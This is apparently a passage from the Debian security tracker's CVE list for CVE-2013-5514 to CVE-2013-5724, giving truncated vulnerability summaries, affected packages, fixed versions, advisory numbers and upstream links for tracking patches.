NOT-FOR-US: Byword for iOS CVE-2013-5724 (Phpbb3 before 3.0.11-4 for Debian GNU/Linux uses world-writable permis ...) {DSA-2752-1} - phpbb3 3.0.11-4 (bug #711172) CVE-2013-5723 (SQL injection vulnerability in SAP NetWeaver 7.30 allows remote attack ...) NOT-FOR-US: SAP NetWeaver CVE-2013-5716 (Gretech GOM Media Player 2.2.53.5169 and possibly earlier allows remot ...) NOT-FOR-US: Gretech GOM Media Player CVE-2013-5715 (Buffer overflow in Gretech GOM Media Player before 2.2.53.5169 has uns ...) NOT-FOR-US: Gretech GOM Media Player CVE-2013-5714 (Multiple cross-site scripting (XSS) vulnerabilities in ls/htmlchat.php ...) NOT-FOR-US: WordPress plugin videowhisper-live-streaming-integration CVE-2013-5713 RESERVED CVE-2013-5712 RESERVED CVE-2013-5711 (Cross-site scripting (XSS) vulnerability in admin/walkthrough/walkthro ...) NOT-FOR-US: Design-approval-system Plugin for WordPress CVE-2013-5722 (Unspecified vulnerability in the LDAP dissector in Wireshark 1.8.x bef ...) {DSA-2756-1} - wireshark 1.10.2-1 NOTE: https://www.wireshark.org/security/wnpa-sec-2013-59.html CVE-2013-5721 (The dissect_mq_rr function in epan/dissectors/packet-mq.c in the MQ di ...) {DLA-497-1} - wireshark 1.10.2-1 (unimportant) NOTE: Not suitable for code injection NOTE: https://www.wireshark.org/security/wnpa-sec-2013-58.html CVE-2013-5720 (Buffer overflow in the RTPS dissector in Wireshark 1.8.x before 1.8.10 ...) {DSA-2756-1} - wireshark 1.10.2-1 NOTE: https://www.wireshark.org/security/wnpa-sec-2013-57.html CVE-2013-5719 (epan/dissectors/packet-assa_r3.c in the ASSA R3 dissector in Wireshark ...) {DLA-497-1} - wireshark 1.10.2-1 (unimportant) NOTE: Not suitable for code injection NOTE: https://www.wireshark.org/security/wnpa-sec-2013-56.html CVE-2013-5718 (The dissect_nbap_T_dCH_ID function in epan/dissectors/packet-nbap.c in ...) {DSA-2756-1} - wireshark 1.10.2-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: https://www.wireshark.org/security/wnpa-sec-2013-55.html CVE-2013-5717 (The Bluetooth HCI ACL dissector in Wireshark 1.10.x before 1.10.2 does ...) - wireshark 1.10.2-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) NOTE: https://www.wireshark.org/security/wnpa-sec-2013-54.html CVE-2013-5710 (The nullfs implementation in sys/fs/nullfs/null_vnops.c in the kernel ...) {DSA-2769-1} - kfreebsd-9 9.2~svn255465-1 (bug #722337) - kfreebsd-8 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) [wheezy] - kfreebsd-8 8.3-6+deb7u1 CVE-2013-5709 (The authentication implementation in the web server on Siemens SCALANC ...) NOT-FOR-US: Siemens SCALANCE X-200 CVE-2013-5708 (Coursemill Learning Management System (LMS) 6.8 constructs secret toke ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-5707 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-5706 (Multiple cross-site scripting (XSS) vulnerabilities in Coursemill Lear ...) NOT-FOR-US: Coursemill Learning Management System CVE-2013-5705 (apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attack ...) {DSA-2991-1 DLA-34-1} - modsecurity-apache 2.7.7-1 - libapache-mod-security [squeeze] - libapache-mod-security 2.5.12-1+squeeze4 NOTE: Upstream commit: https://github.com/SpiderLabs/ModSecurity/commit/f8d441cd25172fdfe5b613442fedfc0da3cc333d NOTE: http://martin.swende.se/blog/HTTPChunked.html CVE-2013-5704 (The mod_headers module in the Apache HTTP Server 2.2.22 allows remote ...) {DLA-71-1} - apache2 2.4.10-2 (medium) [wheezy] - apache2 2.2.22-13+deb7u4 NOTE: http://marc.info/?l=apache-httpd-dev&m=139636309822854&w=2 CVE-2013-5703 (The DrayTek Vigor 2700 router 2.8.3 allows remote attackers to execute ...) NOT-FOR-US: DrayTek Vigor 2700 router CVE-2013-5702 (Multiple cross-site scripting (XSS) vulnerabilities in WebCenter in Wa ...) NOT-FOR-US: Watchguard Server Center CVE-2013-5701 (Multiple untrusted search path vulnerabilities in (1) Watchguard Log C ...) NOT-FOR-US: Watchguard Server Center CVE-2013-5700 (The Bloom Filter implementation in bitcoind and Bitcoin-Qt 0.8.x befor ...) - bitcoin 0.8.4-1 NOTE: https://bitcointalk.org/index.php?topic=287351.0 CVE-2013-5699 RESERVED CVE-2013-5698 (Cross-site scripting (XSS) vulnerability in Open-Xchange AppSuite and ...) NOT-FOR-US: Open-Xchange CVE-2013-5697 (SQL injection vulnerability in mod_accounting.c in the mod_accounting ...) - libapache-mod-acct CVE-2013-5696 (inc/central.class.php in GLPI before 0.84.2 does not attempt to make i ...) - glpi 0.84.2-1 (unimportant; bug #723837) NOTE: Only supported behind an authenticated HTTP zone CVE-2013-5695 (Multiple cross-site scripting (XSS) vulnerabilities in Opsview before ...) NOT-FOR-US: Ops View CVE-2013-5694 (SQL injection vulnerability in status/service/acknowledge in Opsview b ...) NOT-FOR-US: Ops View CVE-2013-5693 (Cross-site scripting (XSS) vulnerability in X2Engine X2CRM before 3.5 ...) NOT-FOR-US: X2CRM CVE-2013-5692 (Directory traversal vulnerability in X2Engine X2CRM before 3.5 allows ...) NOT-FOR-US: X2CRM CVE-2013-5691 (The (1) IPv6 and (2) ATM ioctl request handlers in the kernel in FreeB ...) {DSA-2769-1} - kfreebsd-9 9.2~svn255465-1 (bug #722338) - kfreebsd-8 [squeeze] - kfreebsd-8 (Unsupported in squeeze-lts) [wheezy] - kfreebsd-8 8.3-6+deb7u1 CVE-2013-5690 (Multiple cross-site scripting (XSS) vulnerabilities in Open-Xchange Ap ...) NOT-FOR-US: Open-Xchange CVE-2013-5687 (RiskNet Acquirer before hotfix 6.0 b7+ADHOC-443 ApplicationServiceBean ...) NOT-FOR-US: RiskNet Acquirer CVE-2013-5686 RESERVED CVE-2013-5685 RESERVED CVE-2013-5684 RESERVED CVE-2013-5683 RESERVED CVE-2013-5682 RESERVED CVE-2013-5681 RESERVED CVE-2013-5680 (Heap-based buffer overflow in hfaxd in HylaFAX+ 5.2.4 through 5.5.3, w ...) - hylafax (Not built with LDAP support) NOTE: http://www.securityfocus.com/archive/1/528943/30/0/threaded CVE-2013-5679 (The authenticated-encryption feature in the symmetric-encryption imple ...) NOT-FOR-US: OWASP Enterprise Security API for Java CVE-2013-5678 RESERVED CVE-2013-5677 RESERVED CVE-2013-5676 (The Jenkins Plugin for SonarQube 3.7 and earlier allows remote authent ...) NOT-FOR-US: SonarQube Jenkins plugin CVE-2013-5674 (badges/external.php in Moodle 2.5.x before 2.5.2 does not properly han ...) - moodle 2.5.2-1 [squeeze] - moodle (Only affects 2.5.x) CVE-2013-5669 (The Thecus NAS server N8800 with firmware 5.03.01 uses cleartext crede ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5668 (The ADS/NT Support page on the Thecus NAS server N8800 with firmware 5 ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5667 (The Thecus NAS server N8800 with firmware 5.03.01 allows remote attack ...) NOT-FOR-US: Thecus NAS server N8800 CVE-2013-5666 (The sendfile system-call implementation in sys/kern/uipc_syscalls.c in ...) - kfreebsd-9 9.2~svn255465-1 (bug #722336) [wheezy] - kfreebsd-9 (Only affects 9.2.x) CVE-2013-5665 RESERVED CVE-2013-5664 (Cross-site scripting (XSS) vulnerability in the web-based device-manag ...) NOT-FOR-US: Palo Alto Networks PAN-OS CVE-2013-5663 (The App-ID cache feature in Palo Alto Networks PAN-OS before 4.0.14, 4 ...) NOT-FOR-US: Palo Alto Networks PAN-OS CVE-2013-5662 RESERVED CVE-2013-5661 (Cache Poisoning issue exists in DNS Response Rate Limiting. ...) NOTE: DNS protocol flaw NOTE: http://www.certa.ssi.gouv.fr/site/CERTA-2013-AVI-506/index.html NOTE: https://www.isc.org/blogs/cache-poisoning-gets-a-second-wind-from-rrl-probably-not/ CVE-2013-5660 (Buffer overflow in Power Software WinArchiver 3.2 allows remote attack ...) NOT-FOR-US: Power Software WinArchiver CVE-2013-5659 (Wiz 5.0.3 has a user mode write access violation ...) NOT-FOR-US: Wiz CVE-2013-5658 (AultWare pwStore 2010.8.30.0 has XSS ...) NOT-FOR-US: AultWare pwStore CVE-2013-5657 (AultWare pwStore 2010.8.30.0 has DoS via an empty HTTP request ...) NOT-FOR-US: AultWare pwStore CVE-2013-5656 (FuzeZip 1.0.0.131625 has a Local Buffer Overflow vulnerability ...) NOT-FOR-US: FuzeZip CVE-2013-5689 [Arbitrary File Upload] REJECTED CVE-2013-5688 (Multiple directory traversal vulnerabilities in index.php in AjaXplore ...) - ajaxplorer (bug #668381) CVE-2013-5675 RESERVED NOT-FOR-US: Symantec Endpoint Protection CVE-2013-4298 (The ReadGIFImage function in coders/gif.c in ImageMagick before 6.7.8- ...) {DSA-2750-1} - imagemagick 8:6.7.7.10-6 (bug #721273) [squeeze] - imagemagick (Code not vulnerable) CVE-2013-5673 (SQL injection vulnerability in testimonial.php in the IndiaNIC Testimo ...) NOT-FOR-US: IndiaNIC Testimonial plugin 2.2 for WordPress CVE-2013-5672 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Indi ...) NOT-FOR-US: IndiaNIC Testimonial plugin 2.2 for WordPress CVE-2013-5671 (lib/dragonfly/imagemagickutils.rb in the fog-dragonfly gem 0.8.2 for R ...) NOT-FOR-US: fog-dragonfly Ruby Gem CVE-2013-5670 (Cross-site scripting (XSS) vulnerability in spell-check-savedicts.php ...) - serendipity (Spellcheck plugin not included in 1.5.x) CVE-2013-5653 (The getenv and filenameforall functions in Ghostscript 9.10 ignore the ...) {DSA-3691-1 DLA-674-1} - ghostscript 9.19~dfsg-3.1 (low; bug #839118) NOTE: http://bugs.ghostscript.com/show_bug.cgi?id=694724 NOTE: https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8 CVE-2013-5652 RESERVED CVE-2013-5650 (Junos Pulse Secure Access Service (IVE) 7.1 before 7.1r5, 7.2 before 7 ...) NOT-FOR-US: Junos Pulse Secure Access Service CVE-2013-5649 (Multiple cross-site scripting (XSS) vulnerabilities in Juniper Junos P ...) NOT-FOR-US: Juniper CVE-2013-5655 (Directory traversal vulnerability in the FTP server in YingZhi Python ...) NOT-FOR-US: YingZhi Python for iOS CVE-2013-5654 (Vulnerability in YingZhi Python Programming Language v1.9 allows arbit ...) NOT-FOR-US: YingZhi Python for iOS CVE-2013-5651 (The virBitmapParse function in util/virbitmap.c in libvirt before 1.1. ...) - libvirt 1.1.2~rc1-1 [jessie] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) [wheezy] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) [squeeze] - libvirt (vulnerable code not introduced, introduced in v0.10.2-rc1) NOTE: introduced by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=0fc89098a68f0f6962de8be4fc03ddd960ffbf08 NOTE: Upstream fix: http://libvirt.org/git/?p=libvirt.git;a=commit;h=47b9127e883677a0d60d767030a147450e919a25 CVE-2013-5646 (Cross-site scripting (XSS) vulnerability in Roundcube webmail 1.0-git ...) - roundcube (Unclear, 0.9.2 reported not affected, all other issues covered by CVE-2013-5645) CVE-2013-5645 (Multiple cross-site scripting (XSS) vulnerabilities in Roundcube webma ...) - roundcube 0.9.4-1 (bug #721592) [wheezy] - roundcube (Minor issue) [squeeze] - roundcube (Minor issue) NOTE: http://web.archive.org/web/20160311164159/http://trac.roundcube.net/changeset/93b0a30c1c8aa29d862b587b31e52bcc344b8d16/github NOTE: http://web.archive.org/web/20160311132902/http://trac.roundcube.net/changeset/ce5a6496fd6039962ba7424d153278e41ae8761b/github NOTE: http://trac.roundcube.net/ticket/1489251 CVE-2013-5644 RESERVED CVE-2013-5643 REJECTED CVE-2013-5640 (Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote att ...) NOT-FOR-US: Gnew CVE-2013-5639 (Directory traversal vulnerability in users/login.php in Gnew 2013.1 an ...) NOT-FOR-US: Gnew CVE-2013-5648 (Absolute path traversal vulnerability in the handleStartDataFile funct ...) - libdigidoc (Fixed before initial upload to the archive) CVE-2013-5647 (lib/sounder/sound.rb in the sounder gem 1.0.1 for Ruby allows remote a ...) NOT-FOR-US: Sounder Ruby Gem CVE-2013-5642 (The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1 ...) {DSA-2749-1} - asterisk 1:11.5.1~dfsg-1 (bug #721220) NOTE: http://downloads.asterisk.org/pub/security/AST-2013-005.html CVE-2013-5641 (The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1 ...) {DSA-2749-1} - asterisk 1:11.5.1~dfsg-1 (bug #721220) NOTE: http://downloads.asterisk.org/pub/security/AST-2013-004.html CVE-2013-5638 (Transcend WiFiSD 1.8 has persistent XSS ...) NOT-FOR-US: Transcend WiFiSD CVE-2013-5637 (PQI AirCard has persistent XSS ...) NOT-FOR-US: PQI AirCard CVE-2013-5636 (Unlock.exe in Media Encryption EPM Explorer in Check Point Endpoint Se ...) NOT-FOR-US: Check Point Endpoint Security CVE-2013-5635 (Media Encryption EPM Explorer in Check Point Endpoint Security through ...) NOT-FOR-US: Check Point Endpoint Security CVE-2013-5633 REJECTED CVE-2013-5632 REJECTED CVE-2013-5631 REJECTED CVE-2013-5630 REJECTED CVE-2013-5629 REJECTED CVE-2013-5628 REJECTED CVE-2013-5627 REJECTED CVE-2013-5626 REJECTED CVE-2013-5625 REJECTED CVE-2013-5624 REJECTED CVE-2013-5623 REJECTED CVE-2013-5622 REJECTED CVE-2013-5621 REJECTED CVE-2013-5620 REJECTED CVE-2013-5619 (Multiple integer overflows in the binary-search implementation in Spid ...) - iceweasel (Only affects Firefox 25) - iceape (Only affects Firefox 25) CVE-2013-5618 (Use-after-free vulnerability in the nsNodeUtils::LastRelease function ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5617 RESERVED CVE-2013-5616 (Use-after-free vulnerability in the nsEventListenerManager::HandleEven ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5615 (The JavaScript implementation in Mozilla Firefox before 26.0, Firefox ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5614 (Mozilla Firefox before 26.0 and SeaMonkey before 2.23 do not properly ...) - iceweasel (Only affects Firefox 25) CVE-2013-5613 (Use-after-free vulnerability in the PresShell::DispatchSynthMouseMove ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5612 (Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 26. ...) - iceweasel (Only affects Firefox 25) CVE-2013-5611 (Mozilla Firefox before 26.0 does not properly remove the Application I ...) - iceweasel (Only affects Firefox 25) CVE-2013-5610 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox 25) - iceape (Only affects Firefox 25) - icedove (Only affects Firefox 25) CVE-2013-5609 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape CVE-2013-5608 RESERVED CVE-2013-5607 (Integer overflow in the PL_ArenaAllocate function in Mozilla Netscape ...) {DSA-2820-1} - nspr 2:4.10.2-1 CVE-2013-5606 (The CERT_VerifyCert function in lib/certhigh/certvfy.c in Mozilla Netw ...) {DSA-2994-1 DLA-23-1} - nss 2:3.15.3-1 (bug #735105) [squeeze] - nss 3.12.8-1+squeeze8 CVE-2013-5605 (Mozilla Network Security Services (NSS) 3.14 before 3.14.5 and 3.15 be ...) {DSA-2800-1} - nss 2:3.15.3-1 CVE-2013-5604 (The txXPathNodeUtils::getBaseURI function in the XSLT processor in Moz ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel - icedove 17.0.10-1 [squeeze] - icedove [wheezy] - iceape [squeeze] - iceape - iceape CVE-2013-5603 (Use-after-free vulnerability in the nsContentUtils::ContentIsHostInclu ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5602 (The Worker::SetEventListener function in the Web workers implementatio ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5601 (Use-after-free vulnerability in the nsEventListenerManager::SetEventHa ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel - icedove 17.0.10-1 [squeeze] - icedove - iceape [wheezy] - iceape [squeeze] - iceape CVE-2013-5600 (Use-after-free vulnerability in the nsIOService::NewChannelFromURIWith ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [wheezy] - iceape [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5599 (Use-after-free vulnerability in the nsIPresShell::GetPresContext funct ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5598 (PDF.js in Mozilla Firefox before 25.0 and Firefox ESR 24.x before 24.1 ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5597 (Use-after-free vulnerability in the nsDocLoader::doStopDocumentLoad fu ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [wheezy] - iceape [squeeze] - icedove [squeeze] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5596 (The cycle collection (CC) implementation in Mozilla Firefox before 25. ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5595 (The JavaScript engine in Mozilla Firefox before 25.0, Firefox ESR 17.x ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5594 (Mozilla Firefox before 25 allows modification of anonymous content of ...) - firefox-esr (Fixed before initial upload renamed as src:firefox-esr) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=914618 CVE-2013-5593 (The SELECT element implementation in Mozilla Firefox before 25.0, Fire ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox > 17) [squeeze] - iceweasel - icedove (Only affects Firefox > 17) - iceape (Only affects Firefox > 17) CVE-2013-5592 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5591 (Unspecified vulnerability in the browser engine in Mozilla Firefox bef ...) - iceweasel 24.1.0esr-1 [wheezy] - iceweasel (Only affects Firefox >=24) [squeeze] - iceweasel - icedove (Only affects Firefox >=24) - iceape (Only affects Firefox >=24) CVE-2013-5590 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2797-1 DSA-2788-1} - iceweasel 24.1.0esr-1 [squeeze] - iceweasel [squeeze] - icedove [squeeze] - iceape [wheezy] - iceape - icedove 17.0.10-1 - iceape CVE-2013-5634 (arch/arm/kvm/arm.c in the Linux kernel before 3.10 on the ARM platform ...) - linux 3.11.5-1 [wheezy] - linux (KVM for arm introduced in 3.9) - linux-2.6 (KVM for arm introduced in 3.9) CVE-2013-5586 (Cross-site scripting (XSS) vulnerability in wikka.php in WikkaWiki bef ...) NOT-FOR-US: WikkaWiki CVE-2013-5585 RESERVED CVE-2013-5584 RESERVED CVE-2013-5583 (Cross-site scripting (XSS) vulnerability in libraries/idna_convert/exa ...) NOT-FOR-US: Joomla! CVE-2013-5582 (Ammyy Admin 3.2 and earlier stores the client ID at a fixed memory loc ...) NOT-FOR-US: Ammyy Admin CVE-2013-5581 REJECTED CVE-2013-5579 RESERVED CVE-2013-5578 (Buffer overflow in the ToDot method in the WINGRAPHVIZLib.NEATO Active ...) NOT-FOR-US: StarUML CVE-2013-5577 RESERVED CVE-2013-5574 RESERVED CVE-2013-5573 (Cross-site scripting (XSS) vulnerability in the default markup formatt ...) - jenkins 1.565.2-1 (bug #732708) NOTE: http://seclists.org/fulldisclosure/2013/Dec/159 CVE-2013-5572 (Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bi ...) - zabbix 1:2.2.2+dfsg-1 (unimportant) NOTE: http://seclists.org/fulldisclosure/2013/Sep/151 NOTE: Non-issue CVE-2013-5571 (HMailServer 5.3.x and prior: Memory Corruption which could cause DOS ...) NOT-FOR-US: HMailServer CVE-2013-5570 (Cross-site scripting (XSS) vulnerability in the Javascript and CSS Opt ...) NOT-FOR-US: TYPO3 extension (js_css_optimizer) CVE-2013-5569 (SQL injection vulnerability in the Slideshare extension 0.1.0 for TYPO ...) NOT-FOR-US: TYPO3 extension CVE-2013-5589 (SQL injection vulnerability in cacti/host.php in Cacti 0.8.8b and earl ...) {DSA-2747-1} - cacti 0.8.8b+dfsg-3 CVE-2013-5588 (Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b an ...) {DSA-2747-1} - cacti 0.8.8b+dfsg-3 CVE-2013-5587 (Cross-site scripting (XSS) vulnerability in Request Tracker (RT) 4.x b ...) {DSA-2671-1} - request-tracker3.8 (only covers the issues in 4.x) - request-tracker4 4.0.12-2 (bug #709836) NOTE: This is covered by the patches applied for CVE-2013-3371 in DSA-2760 and DSA-2761. NOTE: NVD explicitly mentions CVE-2013-5587 only for the RT 4.x series. NOTE: patch for 3.8.17: https://github.com/bestpractical/rt/compare/rt-3.8.16...rt-3.8.17 NOTE: patch for 4.0.13: https://github.com/bestpractical/rt/compare/rt-4.0.12...rt-4.0.13 NOTE: still not clear why the split was done, but confirmed by upstream that this issue NOTE: is covered by the fixes applied for CVE-2013-3371 CVE-2013-5580 (The (1) Conn_StartLogin and (2) cb_Read_Resolver_Result functions in c ...) - ngircd (only affects 20, 20.1, and 20.2) NOTE: http://arthur.barton.de/pipermail/ngircd-ml/2013-August/000652.html CVE-2013-5576 (administrator/components/com_media/helpers/media.php in the media mana ...) NOT-FOR-US: Joomla! CVE-2013-5575 REJECTED CVE-2013-5568 (The auto-update implementation in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5567 (Cisco Adaptive Security Appliance (ASA) Software 8.4(.6) and earlier, ...) NOT-FOR-US: Cisco ASA CVE-2013-5566 (Cisco NX-OS 5.0 and earlier on MDS 9000 devices allows remote attacker ...) NOT-FOR-US: Cisco NX-OS CVE-2013-5565 (The OSPFv3 functionality in Cisco IOS XR 5.1 allows remote attackers t ...) NOT-FOR-US: Cisco CVE-2013-5564 (The Java process in the Impact server in Cisco Prime Central for Hoste ...) NOT-FOR-US: Cisco Prime Central for Hosted Collaboration Solution CVE-2013-5563 (Cross-site scripting (XSS) vulnerability in Query/NewQueryResult.jsp i ...) NOT-FOR-US: Cisco CS-MARS CVE-2013-5562 (The ITM web server in Cisco Prime Central for Hosted Collaboration Sol ...) NOT-FOR-US: Cisco CVE-2013-5561 (The Safe Search enforcement feature in Cisco Adaptive Security Applian ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5560 (The IPv6 implementation in Cisco Adaptive Security Appliance (ASA) Sof ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5559 (Buffer overflow in the Active Template Library (ATL) framework in the ...) NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2013-5558 (The WIL-A module in Cisco TelePresence VX Clinical Assistant 1.2 befor ...) NOT-FOR-US: Cisco CVE-2013-5557 (The Proxy Bypass Content Rewriter feature in the WebVPN subsystem in C ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5556 (The license-installation module on the Cisco Nexus 1000V switch 4.2(1) ...) NOT-FOR-US: Cisco CVE-2013-5555 (Cisco Unified Communications Manager (aka CUCM or Unified CM) allows r ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-5554 (Directory traversal vulnerability in the web-management interface in t ...) NOT-FOR-US: Cisco Wide Area Application Services CVE-2013-5553 (Multiple memory leaks in Cisco IOS 15.1 before 15.1(4)M7 allow remote ...) NOT-FOR-US: Cisco IOS CVE-2013-5552 (Cisco IOS 12.4(24)MDB9 and earlier on Content Services Gateway (CSG) d ...) NOT-FOR-US: Cisco CVE-2013-5551 (Cisco Adaptive Security Appliance (ASA) Software, when certain same-se ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5550 (The fabric-interconnect component in Cisco Unified Computing System (U ...) NOT-FOR-US: Cisco Unified Computing System CVE-2013-5549 (Cisco IOS XR 3.8.1 through 4.2.0 does not properly process fragmented ...) NOT-FOR-US: Cisco IOS XR CVE-2013-5548 (The IKEv2 implementation in Cisco IOS, when AES-GCM or AES-GMAC is use ...) NOT-FOR-US: Cisco IOS CVE-2013-5547 (Cisco IOS XE 3.9 before 3.9.2S on 1000 ASR devices allows remote attac ...) NOT-FOR-US: Cisco IOS CVE-2013-5546 (The TCP reassembly feature in Cisco IOS XE 3.7 before 3.7.3S and 3.8 b ...) NOT-FOR-US: Cisco IOS CVE-2013-5545 (The PPTP ALG implementation in Cisco IOS XE 3.9 before 3.9.2S on 1000 ...) NOT-FOR-US: Cisco IOS CVE-2013-5544 (The VPN authentication functionality in Cisco Adaptive Security Applia ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5543 (Cisco IOS XE 3.4 before 3.4.2S and 3.5 before 3.5.1S on 1000 ASR devic ...) NOT-FOR-US: Cisco IOS CVE-2013-5542 (Cisco Adaptive Security Appliance (ASA) Software 8.4 before 8.4(7.2), ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5541 (Cross-site scripting (XSS) vulnerability in the file-upload interface ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5540 (The file-upload feature in Cisco Identity Services Engine (ISE) allows ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5539 (The upload-dialog implementation in Cisco Identity Services Engine (IS ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5538 (The Sponsor Portal in Cisco Identity Services Engine (ISE) uses weak p ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5537 (The web framework on Cisco Web Security Appliance (WSA), Email Securit ...) NOT-FOR-US: Cisco CVE-2013-5536 (Cisco Secure Access Control System (ACS) does not properly implement a ...) NOT-FOR-US: Cisco CVE-2013-5535 (The analytics page on Cisco Video Surveillance 4000 IP cameras has har ...) NOT-FOR-US: Cisco Video Surveillance 4000 IP cameras CVE-2013-5534 (Directory traversal vulnerability in the attachment service in the Voi ...) NOT-FOR-US: Cisco Unity Connection CVE-2013-5533 (The image-upgrade functionality on Cisco 9900 Unified IP phones allows ...) NOT-FOR-US: Cisco CVE-2013-5532 (Buffer overflow in the web-application interface on Cisco 9900 IP phon ...) NOT-FOR-US: Cisco CVE-2013-5531 (Cisco Identity Services Engine (ISE) 1.x before 1.1.1 allows remote at ...) NOT-FOR-US: Cisco CVE-2013-5530 (The web framework in Cisco Identity Services Engine (ISE) 1.0 and 1.1. ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-5529 (The deployment module in the server in Cisco WebEx Meeting Center does ...) NOT-FOR-US: Cisco WebEx Meetings Server CVE-2013-5528 (Directory traversal vulnerability in the Tomcat administrative web int ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-5527 (The OSPF functionality in Cisco IOS and IOS XE allows remote attackers ...) NOT-FOR-US: Cisco CVE-2013-5526 (Cisco 9900 fourth-generation IP phones do not properly perform SDP neg ...) NOT-FOR-US: Cisco CVE-2013-5525 (SQL injection vulnerability in the web framework in Cisco Identity Ser ...) NOT-FOR-US: Cisco CVE-2013-5524 (Cross-site scripting (XSS) vulnerability in the troubleshooting page i ...) NOT-FOR-US: Cisco CVE-2013-5523 (The Sponsor Portal in Cisco Identity Services Engine (ISE) 1.2 and ear ...) NOT-FOR-US: Cisco CVE-2013-5522 (Cisco IOS on Catalyst 3750X switches has default Service Module creden ...) NOT-FOR-US: Cisco IOS CVE-2013-5521 (Cisco Identity Services Engine does not properly restrict the creation ...) NOT-FOR-US: Cisco CVE-2013-5520 RESERVED CVE-2013-5519 (Cross-site scripting (XSS) vulnerability in the management interface o ...) NOT-FOR-US: Cisco CVE-2013-5518 RESERVED CVE-2013-5517 (SQL injection vulnerability in the web framework in Cisco Unified Comm ...) NOT-FOR-US: Cisco CVE-2013-5516 (The Media Snapshot implementation on Cisco TelePresence Multipoint Swi ...) NOT-FOR-US: Cisco CVE-2013-5515 (The Clientless SSL VPN feature in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-5514 